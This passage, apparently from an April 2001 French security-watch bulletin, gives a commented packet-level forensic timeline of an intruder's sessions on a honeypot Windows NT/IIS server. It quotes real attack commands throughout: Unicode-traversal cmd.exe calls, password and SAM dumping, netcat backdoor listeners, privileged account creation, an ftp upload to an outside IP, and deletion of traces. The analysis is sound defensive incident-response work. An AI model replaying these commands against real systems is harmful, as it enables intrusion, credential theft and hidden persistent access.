Veille Technologique Sécurité - cert devoteam

More documents

Recommendations

Info

Avril 2001 Durée 8s A partir de cet instant, l'attaquant attaque sur 2 fronts en maintenant la connexion ouverte NC 6969 1342 Ouverture connexion TCP port 6969 Accès distant sur le système 1345 - 'dir' Localication de pdump.exe UNICODE 1361 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Récupération des mots de passe NC 6969 1371 - 'dir' (plusieurs fois) Contrôle du résultat de pdump.exe 1398 - 'del ftpcom' Effacement du fichier de commande 1411 - 'dir' Contrôle du résultat de pdump.exe 1430 - 'type readme' ???? UNICODE 1444 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Nouvelle tentative Durée 1mn03s Désormais, l'attaquant travail en mode interactif mais n'est pas sûr de lui ! NC 6969 1458 -'c:' Commande erronée 1462 - 'cd \' Retour à la racine 1466 - 'dir' Visualisation du répertoire 1479 - 'rm' Erreur, on n'est pas sous UNIX ! 1489 - 'del fun' Destruction d'un fichier inexistant 1493 - 'dir' On vérifie 1506 - 'cd exploites' Déplacement vers un répertoire inexistant 1510 - 'dir' On vérifie 1521 - 'cd exploits' 'dir' On parcours les différents répertoires 1544 - 'cd microsoft' 'dir' 'cd exploits' Et on atteint le rythme de croisière 1562 - 'cd newfile' 'dir' 'cd ..' 1582 - 'cd unix' 'dir' 'cd ..' 1605 - 'cd ..' 'dir' De retour à la racine UNICODE 1623 cmd.exe /c c:\xxxx\xxx\msadc\pdump.exe >> yay.txt Nouvelle tentative Durée 2mn08s De très nombreuses erreurs confirment l'inexpérience ou la nervosité de l'attaquant NC 6969 1633 - 'dir' Contrôle du résultat de pdump.exe 1642 - 'dir ..' 'dir' En se trompant à plusieurs reprises 1660 - 'cat yay.txt' Il ne s'agit pas d'un système UNIX 1668 - 'type yay' 'type aya.txt' Mais bien d'un système NT 1691 - 'net session' [Access denied] Visualisation des connexions NetBios 1702 - 'net users' Visualisation des comptes locaux Durée 2mn33s L'attaquant est persuadé disposer de privilèges supplémentaires via l'attaque UNICODE !!! UNICODE 1734 cmd.exe /c net session >> yay2.txt Nouvelle tentative de visualisation Netbios 1753 cmd.exe /c net session >> yay2.txt Incrédulité ou naïveté NC 6969 1765 - 'dir' Contrôle du résultat 1782 - 'type aya2.txt' Le fichier a été crée mais ne contient rien 1799 - 'del aya2.txt' Destruction des traces (quid de 'yay.txt' !) 1826 - 'net session > yay3.txt' Quelle persévérance 1849 - 'dir' 'del yay&.*' Destruction laborieuse des traces 1866 - 'del yay.*' Cannot …. Used by another process' !!! 1885 - 'del yay3.txt' 'dir' Not found. La tension monte … UNICODE 1905 cmd.exe /c net user >> heh.txt Oubli, le résultat est déjà connu 1992 cmd.exe /c net user >> c:\heh.txt Durée 31s Les actions suivantes se répètent avec toujours de nombreuses erreurs de frappe. UNICODE ….. Durée 1mn08s L'attaquant ne peut s'empêcher de signer son 'forfait' ! NC 6969 2085 echo Hi, i know that this a is a lab server but patch the Tout exploit doit être signé sinon à quoi holes ! :-) >> README.NOW.Hax0r bon se fatiguer.. Durée 4mn35 Il tente de créer 2 utilisateurs déjà déclarés en utilisant l'aide en ligne ! NC 6969 2187 'net group ?' Une bonne dizaine de tentatives pour 2203 'net group /?' arriver à visualiser les groupes déclarés ! UNICODE 2320 cmd.exe /c net localgroup DomainsAdmins WAM_KENNY Et toujours de multiples erreurs en 2339 /ADD cmd.exe /c net localgroup DomainsAdmins IUSR_KENNY /ADD voulant créer un compte privilégié ! NC 6969 2401 'net local group domains admins' Idem en interactif. L'attaquant semble 2445 'net localgroup adm inistrators' découvrir les subtilités de l'administration UNICODE 2452 cmd.exe /c net localgroup Administrators IUSR_KENNY /ADD Et toujours de multiples erreurs en 2471 cmd.exe /c net localgroup Administrators WAM_KENNY /ADD voulant créer un compte privilégié ! NC 6969 2506 'net localgroup administrators' On contrôle le résultat en interactif Durée 2mn28 Les actions suivantes visent à parcourir le système avec de nombreuses erreurs NC 6969 ….. 2773 'ps u' Toujours et encore UNIX 2786 'pdump.exe' …. [Failed to open LSA] Une explication du problème rencontré ! Durée 6mn25 Une nouvelle tentative de création d'un compte est effectuée UNICODE 2814 cmd.exe /c net user testuser UgotHacked /ADD 2833 cmd.exe /c net localgroup Administrators testuser /ADD NETBIOS 2840 NETBIOS over TCP Tentative de connexion NC 6969 2903 'net users' … Hélas, le compte n'a pas été créé 2949 'net users hi guy /add' … Encore une tentative sans succès 2980 'net password' … Une commande inexistante 3055 'net user himan Har Har666 /ADD' Une nouvelle tentative qui échoue Durée 17s Finalement, l'attaquant efface (presque) toutes ses traces Veille Technologique Sécurité N°33 Page 46/59 © APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001 NC 6969 3149 3163 'del samdump.dll' 'del pdump.exe' Ici encore, de nombreuses commandes erronées sont passées Durée 6mn54s Puis tente de récupérer le contenu de la base de sécurité dont les mots de passe NC 6969 3196 'cd repair' Le répertoire de backup 'rdisk /s' De multiples appels sans succès à 'rdisk' 3282 'cat' Toujours et encore UNIX 3295 'type sam._' [Access Denied] Une tentative désespérée ! UNICODE 3328 cmd.exe /c rdisk -s L'attaquant ne sait plus comment faire ! 3348 cmd.exe /c rdisk Et teste différentes syntaxes après avoir 3392 cmd.exe /c rdisk -s / visualisé à plusieurs reprises le répertoire. 3434 cmd.exe /c rdisk /s - Un essai avec un mécanisme UNIX 3527 cmd.exe /c type c:\winnt\repair\sam._ >> c:\har.txt Pour enfin aboutir au résultat NC 3640 'exit' Déconnexion par arrêt de l'interpréteur Durée 2mn17s L'attaquant tente de récupérer le fichier via une nouvelle connexion sur le port TCP/6968 UNICODE 3747 cmd1.exe nc -l -p 6968 cmd1.exe Activation d'un accès caché sur TCP/6968 NC 6968 3920 'copy c:\har.txt c:\InetPub\wwwroot' Copie du fichier sous la racine WEB HTTP 3927 GET /har.txt Et récupération réussie du fichier NC 6968 3950 'del har.txt' Destruction de la copie sous la racine WEB Durée 3mn22s L'attaquant réussi à détruire la copie du fichier à la racine du serveur après plusieurs tentatives en mode interactif et indirect. NC 6968 Il s'acharne - plus de 15 essais - à tenter de détruire le fichier déjà éliminé car il oublie de changer de UNICODE répertoire ! Durée 35s Les volumes disques existant sont ensuite systématiquement recherchés NC 6968 4095 'd:' Tentative de changement de volumes 4100 'e:' portant sur volumes fixes (c: à f:) mais 4128 'f:' aussi amovibles (a:, b:) ! 4144 'a:' 'b:' Durée 15s L'attaquant finit par se déconnecter puis réactive deux portes masquées NC 6968 4192 'exit' Déconnexion par arrêt de l'interpréteur UNICODE 4223-26 cmd1.exe nc -l -p 6968 cmd1.exe Activation d'un accès caché sur TCP/6968 UNICODE 4233-36 cmd1.exe nc -l -p 6868 cmd1.exe Activation d'un accès caché sur TCP/6868 Durée Quelques attaques continuent durant l'Incident N°2 UNICODE 4367-70 Lecture BOOT.INI [OK] Opération déjà effectuée au tout début 4381-84 Lecture READ.NOW.Hax0r [Not found] L'attaquant ne se souvient plus du nom 4397-00 Lecture READ.me.NOW.Hax0r [Not found] donné il y a 1/2 heure (paquet 2085) ! HEURE: 14h20 INCIDENT N°2 Une attaque est perpétrée depuis l'adresse depuis l'adresse ip60-156.hksp.net Méthode Paquet Commande Commentaire Durée 4mn19s Il se connecte sur TCP/6868 et immédiatement réengage un parcours des répertoires NC 6868 4238 4295 4288 4298 'dir' 'mkdir test' 'type hart.txt' Parcours des répertoires. Aucune faute de frappe ou erreur ne peut être notée ! Durée 20mn58s L'attaquant annonce qu'il a faire à un honey pot et continue à parcourir le système NC 6868 4351 4552 4971 5173 5204 'echo best honey pot i've seen till now :) > rfp.tx 'type README.NOW.Hax0r' 'mdir test' 'copy default.htm default.html' 'echo >> default.htm' Lit le fichier signant la première attaque Commet une seule erreur Sauvegarde la page d'accueil Et ajoute une ligne à l'original Durée 15s L'attaquant finit par se déconnecter NC 6868 5536 'exit' Déconnexion par arrêt de l'interpréteur HEURE: 14h50 INCIDENT N°3 Reprise des attaques perpétrées depuis l'adresse 1Cust162.tnt13.stk3.da.uu.net Méthode Paquet Commande Commentaire Durée 8s Un grand silence: quelques connexions WEB et quelques 'pings' puis de nouveau: UNICODE 5286 cmd.exe /c copy c:\winnt\system32\cmd.exe cmd1.exe Copie d'un interpréteur Durée 52s Il transfère un fichier d'archive HTTP 5302-6 5317-20 5348-52 5362-66 5375-79 cmd1.exe echo open 213.116.251.162 > ftpcom cmd1.exe echo johna2k >> ftpcom cmd1.exe echo put c;\wiretrip\whisker.tar.gz >> ftpcom cmd1.exe echo quit >> ftpcom cmd1.exe fto -s ftpcom L'attaquant place un fichier de commande ftp visant à rapatrier une archive contenant whisker sur son système ! FTP 5379 Initialisation du Transfert FTP Durée 1mn59s Se ménage un point d'entrée UNICODE cmd1.exe nc -l -p 6969 cmd1.exe Activation d'un accès caché sur TCP/6969 FTP 5736 Fin du Transfert FTP Durée 43s Détruit les traces HTTP 5766-69 cmd1.exe del ftpcom On efface les traces A partir de cet instant aucune autre activité anormale n'est journalisée Analyse de niveau "Session" (Durée approximative: 2 heures avec les résultats précédents) Veille Technologique Sécurité N°33 Page 47/59 © APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Page 1 and 2: APOGEE Communications Rapport de Ve
Page 3 and 4: Avril 2001 MICROSOFT 27 NCM 27 NETS
Page 5 and 6: Avril 2001 LES PRODUITS TELEPHONIE
Page 7 and 8: Avril 2001 LES TECHNOLOGIES SYSTEME
Page 9 and 10: Avril 2001 LES INFORMATIONS CERT IN
Page 11 and 12: Avril 2001 technologiques avec des
Page 13 and 14: Avril 2001 LES SERVICES DE BASE LOG
Page 15 and 16: Avril 2001 NORMES ET STANDARDS LES
Page 17 and 18: Avril 2001 Thème Nom du Draft Date
Page 19 and 20: Avril 2001 SIP draft-ietf-simple-im
Page 21 and 22: Avril 2001 IPv6, en l'absence d'une
Page 23 and 24: Avril 2001 FORMAT DE LA PRESENTATIO
Page 25 and 26: Avril 2001 Déni de service sur les
Page 27 and 28: Avril 2001 MICROSOFT Débordement d
Page 29 and 30: Avril 2001 WATCHGUARD Déni de serv
Page 31 and 32: Avril 2001 PGP Exposition de clé p
Page 33 and 34: Avril 2001 Reprise de l'avis CERT C
Page 35 and 36: Avril 2001 OpenBSD Disponibilité d
Page 37 and 38: Avril 2001 LINUX REDHAT Annonce de
Page 39 and 40: Avril 2001 MS00-098 Indexing Servic
Page 41 and 42: Avril 2001 y a quelques années ave
Page 43 and 44: Avril 2001 GET /guest/default.asp/.
Page 45: Avril 2001 Une synthèse commentée
Page 49 and 50: Avril 2001 Microsoft(R) Windows NT(
Page 51 and 52: Avril 2001 12/26/00 07:10p New Fol
Page 53 and 54: Avril 2001 C:\Program Files\Common
Page 55 and 56: Avril 2001 12/15/00 07:05p 673 lrfp
Page 57 and 58: Avril 2001 11/26/00 12:34p 0 AUTOEX
Page 59: Avril 2001 Conclusion 1. Deux vague

Veille Technologique Sécurité - cert devoteam

Create successful ePaper yourself

Delete template?

Save as template?